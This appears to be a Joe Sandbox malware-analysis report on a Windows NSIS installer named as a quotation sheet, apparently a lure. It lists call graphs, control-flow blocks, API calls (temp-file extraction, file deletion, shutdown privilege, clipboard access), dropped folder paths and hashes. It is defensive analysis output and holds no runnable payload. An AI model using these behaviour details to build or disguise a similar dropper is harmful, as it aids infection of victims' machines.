4354->4356 4357 403906 4354->4357 4355->4344 4355->4354 4359 405900 CharNextA 4355->4359 4356->4357 4360 4038f0 GetFileAttributesA 4356->4360 4361 4058d5 3 API calls 4357->4361 4364 403aa8 19 API calls 4358->4364 4358->4384 4362 4038d0 4359->4362 4363 4038fc 4360->4363 4365 40390c 4361->4365 4362->4354 4363->4357 4366 40591c 2 API calls 4363->4366 4367 4039e6 4364->4367 4443 405e63 lstrcpynA 4365->4443 4366->4357 4369 4039f2 ShowWindow 4367->4369 4370 403a75 4367->4370 4372 40618e 3 API calls 4369->4372 4435 40514e OleInitialize 4370->4435 4374 403a0a 4372->4374 4373 403a7b 4375 403a97 4373->4375 4376 403a7f 4373->4376 4377 403a18 GetClassInfoA 4374->4377 4379 40618e 3 API calls 4374->4379 4378 40140b 2 API calls 4375->4378 4383 40140b 2 API calls 4376->4383 4376->4384 4380 403a42 DialogBoxParamA 4377->4380 4381 403a2c GetClassInfoA RegisterClassA 4377->4381 4378->4384 4379->4377 4382 40140b 2 API calls 4380->4382 4381->4380 4382->4384 4383->4384 4384->4274 4385->4209 4386->4254 4387->4224 4389 403702 CloseHandle 4388->4389 4390 40370c 4388->4390 4389->4390 4391 403720 4390->4391 4392 403716 CloseHandle 4390->4392 4452 40374e 4391->4452 4392->4391 4395 405705 69 API calls 4396 403528 OleUninitialize 4395->4396 4396->4231 4396->4232 4400 40566e 4397->4400 4398 403547 ExitProcess 4399 405682 MessageBoxIndirectA 4399->4398 4400->4398 4400->4399 4402 4061fc 5 API calls 4401->4402 4403 403554 lstrcatA 4402->4403 4403->4248 4403->4249 4405 405593 GetLastError 4404->4405 4406 403596 4404->4406 4405->4406 4407 4055a2 SetFileSecurityA 4405->4407 4406->4262 4407->4406 4408 4055b8 GetLastError 4407->4408 4408->4406 4410 4055d3 GetLastError 4409->4410 4411 4055cf 4409->4411 4410->4411 4411->4262 4412->4263 4413->4267 4415 401389 2 API calls 4414->4415 4416 401420 4415->4416 4416->4233 4418 405b10 GetTickCount GetTempFileNameA 4417->4418 4419 403229 4418->4419 4420 405b3d 4418->4420 4419->4211 4420->4418 4420->4419 4421->4301 4422->4303 4423->4307 4424->4326 4425->4318 4427 403abc 4426->4427 4444 405dc1 wsprintfA 4427->4444 4429 403b2d 4430 405e85 18 API calls 4429->4430 4431 403b39 SetWindowTextA 4430->4431 4432 403868 4431->4432 4433 403b55 4431->4433 4432->4342 4433->4432 4434 405e85 18 API calls 4433->4434 4434->4433 4445 404094 4435->4445 4437 404094 SendMessageA 4439 4051aa OleUninitialize 4437->4439 4438 405171 4441 405198 4438->4441 4448 401389 4438->4448 4439->4373 4441->4437 4442->4339 4443->4344 4444->4429 4446 4040ac 4445->4446 4447 40409d SendMessageA 4445->4447 4446->4438 4447->4446 4450 401390 4448->4450 4449 4013fe 4449->4438 4450->4449 4451 4013cb MulDiv SendMessageA 4450->4451 4451->4450 4453 40375c 4452->4453 4454 403725 4453->4454 4455 403761 FreeLibrary GlobalFree 4453->4455 4454->4395 4455->4454 4455->4455 5562 4064ae 5564 406332 5562->5564 5563 406c9d 5564->5563 5564->5564 5565 4063b3 GlobalFree 5564->5565 5566 4063bc GlobalAlloc 5564->5566 5567 406433 GlobalAlloc 5564->5567 5568 40642a GlobalFree 5564->5568 5565->5566 5566->5563 5566->5564 5567->5563 5567->5564 5568->5567 4707 4015b3 4708 402a3a 18 API calls 4707->4708 4709 4015ba 4708->4709 4710 40596e 4 API calls 4709->4710 4723 4015c2 4710->4723 4711 40161c 4713 401621 4711->4713 4714 40164a 4711->4714 4712 405900 CharNextA 4712->4723 4715 401423 25 API calls 4713->4715 4717 401423 25 API calls 4714->4717 4716 401628 4715->4716 4726 405e63 lstrcpynA 4716->4726 4722 401642 4717->4722 4718 4055bf 2 API calls 4718->4723 4720 4055dc 5 API calls 4720->4723 4721 401633 SetCurrentDirectoryA 4721->4722 4723->4711 4723->4712 4723->4718 4723->4720 4724 401604 GetFileAttributesA 4723->4724 4725 405542 4 API calls 4723->4725 4724->4723 4725->4723 4726->4721 5569 4016b3 5570 402a3a 18 API calls 5569->5570 5571 4016b9 GetFullPathNameA 5570->5571 5572 4016d0 5571->5572 5573 4016f1 5571->5573 5572->5573 5576 406167 2 API calls 5572->5576 5574 401705 GetShortPathNameA 5573->5574 5575 4028cf 5573->5575 5574->5575 5577 4016e1 5576->5577 5577->5573 5579 405e63 lstrcpynA 5577->5579 5579->5573 5580 4014b7 5581 4014bd 5580->5581 5582 401389 2 API calls 5581->5582 5583 4014c5 5582->5583 5591 401d38 GetDC GetDeviceCaps 5592 402a1d 18 API calls 5591->5592 5593 401d56 MulDiv ReleaseDC 5592->5593 5594 402a1d 18 API calls 5593->5594 5595 401d75 5594->5595 5596 405e85 18 API calls 5595->5596 5597 401dae CreateFontIndirectA 5596->5597 5598 402513 5597->5598 4824 4051ba 4825 405365 4824->4825 4826 4051dc GetDlgItem GetDlgItem GetDlgItem 4824->4826 4828 405395 4825->4828 4829 40536d GetDlgItem CreateThread FindCloseChangeNotification 4825->4829 4870 40407d SendMessageA 4826->4870 4831 4053c3 4828->4831 4832 4053e4 4828->4832 4833 4053ab ShowWindow ShowWindow 4828->4833 4829->4828 4873 40514e 5 API calls 4829->4873 4830 40524c 4837 405253 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4830->4837 4834 4053cb 4831->4834 4835 40541e 4831->4835 4836 4040af 8 API calls 4832->4836 4872 40407d SendMessageA 4833->4872 4839 4053d3 4834->4839 4840 4053f7 ShowWindow 4834->4840 4835->4832 4845 40542b SendMessageA 4835->4845 4852 4053f0 4836->4852 4843 4052c1 4837->4843 4844 4052a5 SendMessageA SendMessageA 4837->4844 4846 404021 SendMessageA 4839->4846 4841 405417 4840->4841 4842 405409 4840->4842 4848 404021 SendMessageA 4841->4848 4847 40507c 25 API calls 4842->4847 4849 4052d4 4843->4849 4850 4052c6 SendMessageA 4843->4850 4844->4843 4851 405444 CreatePopupMenu 4845->4851 4845->4852 4846->4832 4847->4841 4848->4835 4854 404048 19 API calls 4849->4854 4850->4849 4853 405e85 18 API calls 4851->4853 4855 405454 AppendMenuA 4853->4855 4856 4052e4 4854->4856 4857 405472 GetWindowRect 4855->4857 4858 405485 TrackPopupMenu 4855->4858 4859 405321 GetDlgItem SendMessageA 4856->4859 4860 4052ed ShowWindow 4856->4860 4857->4858 4858->4852 4861 4054a1 4858->4861 4859->4852 4864 405348 SendMessageA SendMessageA 4859->4864 4862 405310 4860->4862 4863 405303 ShowWindow 4860->4863 4865 4054c0 SendMessageA 4861->4865 4871 40407d SendMessageA 4862->4871 4863->4862 4864->4852 4865->4865 4866 4054dd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4865->4866 4868 4054ff SendMessageA 4866->4868 4868->4868 4869 405521 GlobalUnlock SetClipboardData CloseClipboard 4868->4869 4869->4852 4870->4830 4871->4859 4872->4831 4884 40173e 4885 402a3a 18 API calls 4884->4885 4886 401745 4885->4886 4887 405b05 2 API calls 4886->4887 4888 40174c 4887->4888 4889 405b05 2 API calls 4888->4889 4889->4888 5599 401ebe 5600 402a3a 18 API calls 5599->5600 5601 401ec5 5600->5601 5602 406167 2 API calls 5601->5602 5603 401ecb 5602->5603 5605 401edd 5603->5605 5606 405dc1 wsprintfA 5603->5606 5606->5605 5607 40443f 5608 404475 5607->5608 5609 40444f 5607->5609 5611 4040af 8 API calls 5608->5611 5610 404048 19 API calls 5609->5610 5612 40445c SetDlgItemTextA 5610->5612 5613 404481 5611->5613 5612->5608 5614 40193f 5615 402a3a 18 API calls 5614->5615 5616 401946 lstrlenA 5615->5616 5617 402513 5616->5617

                                                                                Executed Functions

                                                                                Function 0040322B Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 357stringcomfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 40322b-403260 SetErrorMode GetVersion 1 403262-40326a call 4061fc 0->1 2 403273 0->2 1->2 7 40326c 1->7 3 403278-40328b call 40618e lstrlenA 2->3 9 40328d-403300 call 4061fc * 2 #17 OleInitialize SHGetFileInfoA call 405e63 GetCommandLineA call 405e63 GetModuleHandleA 3->9 7->2 18 403302-403307 9->18 19 40330c-403321 call 405900 CharNextA 9->19 18->19 22 4033e6-4033ea 19->22 23 4033f0 22->23 24 403326-403329 22->24 27 403403-40341d GetTempPathA call 4031fa 23->27 25 403331-403339 24->25 26 40332b-40332f 24->26 28 403341-403344 25->28 29 40333b-40333c 25->29 26->25 26->26 37 403475-40348f DeleteFileA call 402cb6 27->37 38 40341f-40343d GetWindowsDirectoryA lstrcatA call 4031fa 27->38 31 4033d6-4033e3 call 405900 28->31 32 40334a-40334e 28->32 29->28 31->22 47 4033e5 31->47 35 403350-403356 32->35 36 403366-403393 32->36 41 403358-40335a 35->41 42 40335c 35->42 43 403395-40339b 36->43 44 4033a6-4033d4 36->44 52 403523-403533 call 4036f1 OleUninitialize 37->52 53 403495-40349b 37->53 38->37 55 40343f-40346f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031fa 38->55 41->36 41->42 42->36 49 4033a1 43->49 50 40339d-40339f 43->50 44->31 46 4033f2-4033fe call 405e63 44->46 46->27 47->22 49->44 50->44 50->49 66 403657-40365d 52->66 67 403539-403549 call 405659 ExitProcess 52->67 57 403513-40351a call 4037e3 53->57 58 40349d-4034a8 call 405900 53->58 55->37 55->52 64 40351f 57->64 70 4034aa-4034d3 58->70 71 4034de-4034e8 58->71 64->52 68 4036d9-4036e1 66->68 69 40365f-403678 GetCurrentProcess OpenProcessToken 66->69 76 4036e3 68->76 77 4036e7-4036eb ExitProcess 68->77 73 4036aa-4036b8 call 4061fc 69->73 74 40367a-4036a4 LookupPrivilegeValueA AdjustTokenPrivileges 69->74 75 4034d5-4034d7 70->75 78 4034ea-4034f7 call 4059c3 71->78 79 40354f-403563 call 4055dc lstrcatA 71->79 91 4036c6-4036d0 ExitWindowsEx 73->91 92 4036ba-4036c4 73->92 74->73 75->71 82 4034d9-4034dc 75->82 76->77 78->52 88 4034f9-40350f call 405e63 * 2 78->88 89 403570-40358a lstrcatA lstrcmpiA 79->89 90 403565-40356b lstrcatA 79->90 82->71 82->75 88->57 89->52 94 40358c-40358f 89->94 90->89 91->68 95 4036d2-4036d4 call 40140b 91->95 92->91 92->95 97 403591-403596 call 405542 94->97 98 403598 call 4055bf 94->98 95->68 106 40359d-4035aa SetCurrentDirectoryA 97->106 98->106 107 4035b7-4035df call 405e63 106->107 108 4035ac-4035b2 call 405e63 106->108 112 4035e5-403601 call 405e85 DeleteFileA 107->112 108->107 115 403642-403649 112->115 116 403603-403613 CopyFileA 112->116 115->112 118 40364b-403652 call 405d1e 115->118 116->115 117 403615-403635 call 405d1e call 405e85 call 4055f4 116->117 117->115 127 403637-40363e CloseHandle 117->127 118->52 127->115
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 00403250
                                                                                • GetVersion.KERNEL32 ref: 00403256
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
                                                                                • #17.COMCTL32(00000007,00000009), ref: 004032A1
                                                                                • OleInitialize.OLE32(00000000), ref: 004032A8
                                                                                • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
                                                                                • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000000), ref: 004032EC
                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000020), ref: 00403317
                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403414
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403425
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403431
                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403445
                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040344D
                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040345E
                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403466
                                                                                • DeleteFileA.KERNELBASE(1033), ref: 0040347A
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • OleUninitialize.OLE32(?), ref: 00403528
                                                                                • ExitProcess.KERNEL32 ref: 00403549
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
                                                                                • ExitProcess.KERNEL32 ref: 004036EB
                                                                                  • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                • String ID: "$"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte$C:\Users\user\Desktop$C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 3329125770-113278367
                                                                                • Opcode ID: a1f2791ba50795828a87b347d03cbb000542fb0d094c1ae935a36bc8bc09b862
                                                                                • Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
                                                                                • Opcode Fuzzy Hash: a1f2791ba50795828a87b347d03cbb000542fb0d094c1ae935a36bc8bc09b862
                                                                                • Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E
                                                                                Function 004051BA Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 4051ba-4051d6 129 405365-40536b 128->129 130 4051dc-4052a3 GetDlgItem * 3 call 40407d call 40491a GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405395-4053a1 129->132 133 40536d-40538f GetDlgItem CreateThread FindCloseChangeNotification 129->133 151 4052c1-4052c4 130->151 152 4052a5-4052bf SendMessageA * 2 130->152 135 4053c3-4053c9 132->135 136 4053a3-4053a9 132->136 133->132 140 4053cb-4053d1 135->140 141 40541e-405421 135->141 138 4053e4-4053eb call 4040af 136->138 139 4053ab-4053be ShowWindow * 2 call 40407d 136->139 148 4053f0-4053f4 138->148 139->135 146 4053d3-4053df call 404021 140->146 147 4053f7-405407 ShowWindow 140->147 141->138 144 405423-405429 141->144 144->138 153 40542b-40543e SendMessageA 144->153 146->138 149 405417-405419 call 404021 147->149 150 405409-405412 call 40507c 147->150 149->141 150->149 157 4052d4-4052eb call 404048 151->157 158 4052c6-4052d2 SendMessageA 151->158 152->151 159 405444-405470 CreatePopupMenu call 405e85 AppendMenuA 153->159 160 40553b-40553d 153->160 167 405321-405342 GetDlgItem SendMessageA 157->167 168 4052ed-405301 ShowWindow 157->168 158->157 165 405472-405482 GetWindowRect 159->165 166 405485-40549b TrackPopupMenu 159->166 160->148 165->166 166->160 169 4054a1-4054bb 166->169 167->160 172 405348-405360 SendMessageA * 2 167->172 170 405310 168->170 171 405303-40530e ShowWindow 168->171 173 4054c0-4054db SendMessageA 169->173 174 405316-40531c call 40407d 170->174 171->174 172->160 173->173 175 4054dd-4054fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->167 177 4054ff-40551f SendMessageA 175->177 177->177 178 405521-405535 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405219
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405228
                                                                                • GetClientRect.USER32(?,?), ref: 00405265
                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040526C
                                                                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405308
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405329
                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405237
                                                                                  • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040537A
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040538F
                                                                                • ShowWindow.USER32(00000000), ref: 004053B2
                                                                                • ShowWindow.USER32(?,00000008), ref: 004053B9
                                                                                • ShowWindow.USER32(00000008), ref: 004053FF
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
                                                                                • CreatePopupMenu.USER32 ref: 00405444
                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
                                                                                • GetWindowRect.USER32(?,000000FF), ref: 00405479
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
                                                                                • OpenClipboard.USER32(00000000), ref: 004054DE
                                                                                • EmptyClipboard.USER32 ref: 004054E4
                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004054F7
                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405524
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 0040552F
                                                                                • CloseClipboard.USER32 ref: 00405535
                                                                                Strings
                                                                                • ldreboligblokkene: Installing, xrefs: 004054AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                • String ID: ldreboligblokkene: Installing
                                                                                • API String ID: 4154960007-2674460088
                                                                                • Opcode ID: daaeb23021544b1a8722f3fcbf2dc746f0c1e682d10e69f52f4e240041b4e0fa
                                                                                • Instruction ID: 7964bf5c578b3de76ace8e2c28f1261f98ad7804c3e0f9b8393b3024568df2d6
                                                                                • Opcode Fuzzy Hash: daaeb23021544b1a8722f3fcbf2dc746f0c1e682d10e69f52f4e240041b4e0fa
                                                                                • Instruction Fuzzy Hash: 64A148B1900208BFDB119FA0DD89EAE7B79FB08355F00403AFA04B61A0C7B55E51DF69
                                                                                Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 489 405705-40572b call 4059c3 492 405744-40574b 489->492 493 40572d-40573f DeleteFileA 489->493 495 40574d-40574f 492->495 496 40575e-40576e call 405e63 492->496 494 4058ce-4058d2 493->494 497 405755-405758 495->497 498 40587c-405881 495->498 504 405770-40577b lstrcatA 496->504 505 40577d-40577e call 40591c 496->505 497->496 497->498 498->494 500 405883-405886 498->500 502 405890-405898 call 406167 500->502 503 405888-40588e 500->503 502->494 513 40589a-4058ae call 4058d5 call 4056bd 502->513 503->494 506 405783-405786 504->506 505->506 509 405791-405797 lstrcatA 506->509 510 405788-40578f 506->510 512 40579c-4057ba lstrlenA FindFirstFileA 509->512 510->509 510->512 514 4057c0-4057d7 call 405900 512->514 515 405872-405876 512->515 525 4058b0-4058b3 513->525 526 4058c6-4058c9 call 40507c 513->526 523 4057e2-4057e5 514->523 524 4057d9-4057dd 514->524 515->498 517 405878 515->517 517->498 528 4057e7-4057ec 523->528 529 4057f8-405806 call 405e63 523->529 524->523 527 4057df 524->527 525->503 531 4058b5-4058c4 call 40507c call 405d1e 525->531 526->494 527->523 533 405851-405863 FindNextFileA 528->533 534 4057ee-4057f0 528->534 539 405808-405810 529->539 540 40581d-405828 call 4056bd 529->540 531->494 533->514 537 405869-40586c FindClose 533->537 534->529 538 4057f2-4057f6 534->538 537->515 538->529 538->533 539->533 542 405812-40581b call 405705 539->542 549 405849-40584c call 40507c 540->549 550 40582a-40582d 540->550 542->533 549->533 552 405841-405847 550->552 553 40582f-40583f call 40507c call 405d1e 550->553 552->533 553->533
                                                                                APIs
                                                                                • DeleteFileA.KERNELBASE(?,?,75DF3410,75DF2EE0,00000000), ref: 0040572E
                                                                                • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405776
                                                                                • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 00405797
                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 0040579D
                                                                                • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75DF3410,75DF2EE0,00000000), ref: 004057AE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040586C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$8B$\*.*
                                                                                • API String ID: 2035342205-2820735536
                                                                                • Opcode ID: 59d28fae28702c1bd4f9af7611b40c66467e23846e4621e15b5c3be0a3b2a1d3
                                                                                • Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
                                                                                • Opcode Fuzzy Hash: 59d28fae28702c1bd4f9af7611b40c66467e23846e4621e15b5c3be0a3b2a1d3
                                                                                • Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA
                                                                                Function 004064AE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
                                                                                • Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
                                                                                • Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44
                                                                                Function 00406167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
